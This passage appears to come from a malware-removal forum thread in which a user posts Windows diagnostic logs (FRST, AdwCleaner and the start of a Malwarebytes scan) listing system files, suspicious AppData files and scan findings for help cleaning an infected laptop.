2016-05-10 16:50 - 2016-04-23 01:00 - 01594920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 01522152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 01399224 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 01372304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 01337240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 00550656 _____ (Microsoft Corporation) C:\WINDOWS\system32\directmanipulation.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 00453472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\directmanipulation.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 00058208 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwminit.dll
2016-05-10 16:50 - 2016-04-23 00:56 - 00534872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-05-10 16:50 - 2016-04-23 00:39 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-05-10 16:50 - 2016-04-23 00:35 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosHostClient.dll
2016-05-10 16:50 - 2016-04-23 00:34 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbser.sys
2016-05-10 16:50 - 2016-04-23 00:34 - 00059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\hmkd.dll
2016-05-10 16:50 - 2016-04-23 00:34 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-05-10 16:50 - 2016-04-23 00:33 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmCx.sys
2016-05-10 16:50 - 2016-04-23 00:32 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-05-10 16:50 - 2016-04-23 00:32 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-05-10 16:50 - 2016-04-23 00:31 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-05-10 16:50 - 2016-04-23 00:30 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-05-10 16:50 - 2016-04-23 00:30 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosHostClient.dll
2016-05-10 16:50 - 2016-04-23 00:29 - 00192000 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2016-05-10 16:50 - 2016-04-23 00:29 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\filecrypt.sys
2016-05-10 16:50 - 2016-04-23 00:29 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-05-10 16:50 - 2016-04-23 00:29 - 00072704 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-05-10 16:50 - 2016-04-23 00:29 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hmkd.dll
2016-05-10 16:50 - 2016-04-23 00:29 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ByteCodeGenerator.exe
2016-05-10 16:50 - 2016-04-23 00:29 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2016-05-10 16:50 - 2016-04-23 00:28 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2016-05-10 16:50 - 2016-04-23 00:28 - 00127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEDataLayerHelpers.dll
2016-05-10 16:50 - 2016-04-23 00:28 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2016-05-10 16:50 - 2016-04-23 00:27 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-05-10 16:50 - 2016-04-23 00:26 - 00269824 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-05-10 16:50 - 2016-04-23 00:26 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpdbusenum.dll
2016-05-10 16:50 - 2016-04-23 00:25 - 00630784 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll
2016-05-10 16:50 - 2016-04-23 00:25 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-05-10 16:50 - 2016-04-23 00:25 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00292864 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00287232 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00181248 _____ (Microsoft Corporation) C:\WINDOWS\system32\shacct.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SubscriptionMgr.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEDataLayerHelpers.dll
2016-05-10 16:50 - 2016-04-23 00:23 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ListSvc.dll
2016-05-10 16:50 - 2016-04-23 00:23 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\system32\BrowserSettingSync.dll
2016-05-10 16:50 - 2016-04-23 00:23 - 00080896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2016-05-10 16:50 - 2016-04-23 00:21 - 00479232 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-05-10 16:50 - 2016-04-23 00:21 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 18676224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00484352 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00307200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00137728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shacct.dll
2016-05-10 16:50 - 2016-04-23 00:19 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BrowserSettingSync.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00988672 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00954368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2016-05-10 16:50 - 2016-04-23 00:18 - 00804352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-05-10 16:50 - 2016-04-23 00:18 - 00515072 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-05-10 16:50 - 2016-04-23 00:17 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-05-10 16:50 - 2016-04-23 00:17 - 00529920 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2016-05-10 16:50 - 2016-04-23 00:17 - 00388608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2016-05-10 16:50 - 2016-04-23 00:16 - 01319424 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-05-10 16:50 - 2016-04-23 00:16 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-05-10 16:50 - 2016-04-23 00:15 - 01073152 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-05-10 16:50 - 2016-04-23 00:15 - 00865792 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2016-05-10 16:50 - 2016-04-23 00:15 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-05-10 16:50 - 2016-04-23 00:15 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00870912 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00821760 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00647680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-05-10 16:50 - 2016-04-23 00:13 - 00705536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-05-10 16:50 - 2016-04-23 00:13 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-05-10 16:50 - 2016-04-23 00:13 - 00434688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2016-05-10 16:50 - 2016-04-23 00:12 - 00667648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2016-05-10 16:50 - 2016-04-23 00:10 - 00639488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2016-05-10 16:50 - 2016-04-23 00:09 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-05-10 16:50 - 2016-04-23 00:09 - 02582016 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-05-10 16:50 - 2016-04-23 00:07 - 02598912 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-05-10 16:50 - 2016-04-23 00:07 - 01500160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-05-10 16:50 - 2016-04-23 00:07 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 05502976 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 02166784 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 02066432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 01946112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 00111616 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 00103936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2016-05-10 16:50 - 2016-04-23 00:04 - 04759040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2016-05-10 16:50 - 2016-04-23 00:04 - 01731072 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 02280960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 02193408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 02000896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-05-10 16:50 - 2016-04-23 00:02 - 02444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2016-05-10 16:50 - 2016-04-23 00:01 - 04775424 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-05-10 16:50 - 2016-04-23 00:00 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-05-10 16:50 - 2016-04-23 00:00 - 00984576 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-05-10 16:50 - 2016-04-22 23:45 - 00461824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2016-05-10 16:50 - 2016-04-22 22:10 - 00215040 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2016-05-10 16:49 - 2016-04-23 00:33 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll
2016-05-10 16:49 - 2016-04-23 00:33 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshbth.dll
2016-05-10 16:49 - 2016-04-23 00:33 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\ByteCodeGenerator.exe
2016-05-10 16:49 - 2016-04-23 00:32 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\wificonnapi.dll
2016-05-10 16:49 - 2016-04-23 00:30 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2016-05-10 16:49 - 2016-04-23 00:29 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2016-05-10 16:49 - 2016-04-23 00:28 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-05-10 16:49 - 2016-04-23 00:28 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wshbth.dll
2016-05-10 16:49 - 2016-04-23 00:27 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2016-05-10 16:49 - 2016-04-23 00:25 - 00207360 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-05-10 16:49 - 2016-04-23 00:24 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-05-10 16:49 - 2016-04-23 00:23 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-05-10 16:49 - 2016-04-23 00:22 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEEventDispatcher.dll
2016-05-10 16:49 - 2016-04-23 00:19 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlansec.dll
2016-05-10 16:49 - 2016-04-23 00:18 - 00219648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2016-05-10 16:49 - 2016-04-23 00:18 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2016-05-10 16:49 - 2016-04-23 00:17 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanmsm.dll
2016-05-10 16:49 - 2016-04-22 22:10 - 00002186 _____ C:\WINDOWS\system32\AppxProvisioning.xml
2016-05-10 16:49 - 2016-04-18 18:30 - 00002186 _____ C:\WINDOWS\SysWOW64\AppxProvisioning.xml
2016-05-10 14:44 - 2016-05-10 14:44 - 00000000 _____ C:\autoexec.bat
2016-05-06 02:55 - 2016-05-06 02:55 - 00000319 _____ C:\Users\Jackie\Documents\tracfone acct number.txt

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-05-31 02:44 - 2016-03-13 18:34 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-05-31 02:08 - 2016-02-11 23:23 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-05-30 23:20 - 2015-09-23 14:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-05-30 23:19 - 2016-03-13 18:34 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-05-30 23:18 - 2015-09-15 18:51 - 00000000 __SHD C:\Users\Jackie\IntelGraphicsProfiles
2016-05-30 22:10 - 2015-10-30 02:28 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM
2016-05-30 22:08 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-05-30 22:07 - 2015-10-30 03:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-05-30 00:40 - 2015-03-28 11:45 - 00000000 ____D C:\Users\Jackie\AppData\Local\ElevatedDiagnostics
2016-05-26 21:39 - 2015-12-23 16:15 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-05-26 21:38 - 2015-10-30 02:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-05-26 18:39 - 2016-03-31 12:21 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
2016-05-26 16:33 - 2015-01-30 13:39 - 00000000 ____D C:\ProgramData\McAfee
2016-05-26 16:29 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-05-26 16:05 - 2015-01-30 14:03 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-05-25 23:54 - 2015-05-03 11:53 - 00000000 ___RD C:\Users\Jackie\OneDrive
2016-05-25 23:54 - 2015-03-28 12:04 - 00000000 ____D C:\Users\Jackie\AppData\Local\Adobe
2016-05-25 21:25 - 2015-10-30 03:24 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2016-05-25 18:49 - 2015-01-29 16:36 - 00000000 ____D C:\Users\Jackie\AppData\Local\CrashDumps
2016-05-25 18:27 - 2015-10-30 03:21 - 00000000 ____D C:\WINDOWS\INF
2016-05-25 18:08 - 2014-10-27 10:40 - 00000000 ____D C:\Program Files (x86)\Bluetooth Suite
2016-05-25 16:38 - 2016-02-16 19:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mahjong Duels
2016-05-25 16:38 - 2015-10-30 03:24 - 00000000 ____D C:\Program Files\Windows Defender
2016-05-25 16:38 - 2015-02-03 00:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-05-25 16:38 - 2014-10-27 10:59 - 00000000 ____D C:\ProgramData\Norton
2016-05-25 16:38 - 2014-10-27 10:47 - 00000000 ____D C:\ProgramData\Package Cache
2016-05-25 16:38 - 2014-04-14 07:45 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-05-25 16:37 - 2016-01-26 14:48 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Paltalk Messenger
2016-05-25 16:37 - 2015-10-30 03:24 - 00000000 ___SD C:\WINDOWS\system32\DiagSvcs
2016-05-25 16:37 - 2015-10-30 02:28 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-05-25 16:37 - 2015-10-30 02:28 - 00000000 ____D C:\WINDOWS\servicing
2016-05-25 16:37 - 2015-09-28 19:57 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MahjongChamp
2016-05-25 16:21 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\registration
2016-05-24 21:52 - 2015-02-01 19:11 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-05-24 21:40 - 2015-02-01 19:11 - 139319312 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-05-24 15:22 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-05-24 15:21 - 2016-04-22 16:15 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-05-24 15:21 - 2016-02-16 19:32 - 00001107 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mahjong Duels.lnk
2016-05-24 15:21 - 2016-02-10 17:37 - 00002366 _____ C:\Users\Jackie\Desktop\Kindle.lnk
2016-05-24 15:21 - 2015-12-23 16:07 - 00001564 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-05-24 15:21 - 2015-09-15 19:21 - 00002419 _____ C:\Users\Jackie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-05-24 15:21 - 2014-04-14 08:10 - 00002220 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.lnk
2016-05-24 15:21 - 2014-04-14 07:44 - 00002067 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba Registration.lnk
2016-05-24 15:21 - 2014-04-14 07:40 - 00001074 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TOSHIBA Start.lnk
2016-05-24 15:21 - 2014-04-14 07:38 - 00001995 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
2016-05-22 18:06 - 2015-12-23 15:56 - 00000000 ____D C:\Users\Jackie
2016-05-21 11:42 - 2015-07-10 05:05 - 00000000 ____D C:\Users\Default.migrated
2016-05-19 11:35 - 2016-04-22 16:14 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-05-19 11:29 - 2015-10-30 03:24 - 00000000 __RSD C:\WINDOWS\Media
2016-05-19 00:12 - 2015-11-02 04:23 - 00000000 ____D C:\WINDOWS\System32\Tasks\Component System
2016-05-18 21:41 - 2015-10-26 10:59 - 00000000 ____D C:\Users\Jackie\AppData\LocalLow\Adblock Plus for IE
2016-05-14 11:15 - 2015-10-30 03:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-05-14 05:26 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\rescache
2016-05-13 11:23 - 2015-01-29 12:25 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-05-13 06:39 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-05-13 06:39 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-05-13 06:39 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\Provisioning
2016-05-13 06:38 - 2015-10-30 05:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-05-13 06:38 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-05-13 06:37 - 2015-10-30 03:24 - 00015703 _____ C:\WINDOWS\system32\OEMDefaultAssociations.xml
2016-05-12 13:16 - 2015-01-29 13:40 - 00000000 ____D C:\Users\Jackie\AppData\Local\Packages
2016-05-11 15:57 - 2015-10-30 03:26 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-05-11 15:57 - 2015-10-30 03:26 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-05-10 19:39 - 2016-03-13 18:34 - 00003980 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-05-10 19:39 - 2016-03-13 18:34 - 00003748 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-05-10 14:45 - 2016-02-11 13:47 - 22440784 _____ ( ) C:\Users\Jackie\Downloads\ymahj-setup.exe
2016-05-10 14:00 - 2015-05-23 22:18 - 00124928 ___SH C:\Users\Jackie\Downloads\Thumbs.db
2016-05-10 02:09 - 2015-03-17 00:35 - 00000000 ____D C:\ProgramData\Skype
2016-05-08 00:34 - 2016-02-11 13:48 - 00000000 ____D C:\Users\Jackie\AppData\Local\Mahjong Duels
2016-05-06 13:03 - 2015-03-17 00:36 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Skype
2016-05-02 21:52 - 2014-04-14 07:40 - 00000000 ____D C:\Program Files\TOSHIBA
2016-05-02 21:50 - 2015-01-29 13:42 - 00000000 ____D C:\Users\Jackie\AppData\Local\TOSHIBA

==================== Files in the root of some directories =======

2016-05-24 01:54 - 2016-05-24 01:54 - 6859776 _____ () C:\Users\Jackie\AppData\Roaming\agent.dat
2016-05-24 01:52 - 2016-05-24 01:52 - 0127488 _____ () C:\Users\Jackie\AppData\Roaming\Installer.dat
2016-05-19 10:45 - 2016-05-19 11:11 - 0000115 _____ () C:\Users\Jackie\AppData\Roaming\LogFile.txt
2016-05-24 01:54 - 2016-05-24 01:54 - 0018432 _____ () C:\Users\Jackie\AppData\Roaming\Main.dat
2016-05-24 01:53 - 2016-05-24 01:53 - 0076565 _____ () C:\Users\Jackie\AppData\Roaming\Mat-La.bin
2016-05-24 19:49 - 2016-05-24 19:58 - 0000464 _____ () C:\Users\Jackie\AppData\Local\infection.log
2015-12-23 15:51 - 2015-12-23 15:51 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Some files in TEMP:
====================
C:\Users\Jackie\AppData\Local\Temp\0023321464194555mcinst.exe
C:\Users\Jackie\AppData\Local\Temp\McCSPInstall.dll
C:\Users\Jackie\AppData\Local\Temp\mccspuninstall.exe
C:\Users\Jackie\AppData\Local\Temp\msvcr120.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-05-28 16:21

==================== End of FRST.txt ============================
 
#11 ·
Here is the AdwCleaner log file:

# AdwCleaner v5.119 - Logfile created 31/05/2016 at 03:31:43
# Updated 30/05/2016 by Xplode
# Database : 2016-05-30.3 [Server]
# Operating system : Windows 10 Home (X64)
# Username : Jackie - LAPTOP2
# Running from : C:\Users\Jackie\Downloads\adwcleaner_5.119.exe
# Option : Scan
# Support : http://toolslib.net/forum

***** [ Services ] *****

Service Found : Scheduler
Service Found : 13114cc54a946f641c081c84a88f491d

***** [ Folders ] *****

Folder Found : C:\Users\Jackie\AppData\Local\Temp\MPC

***** [ Files ] *****

***** [ DLL ] *****
 
#12 ·
Here is the first of two MBAM logs:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/12/2016
Scan Time: 11:04 PM
Logfile: malbytes 1.txt
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2016.03.13.01
Rootkit Database: v2016.03.12.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Jackie

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 353212
Time Elapsed: 1 hr, 14 min, 33 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
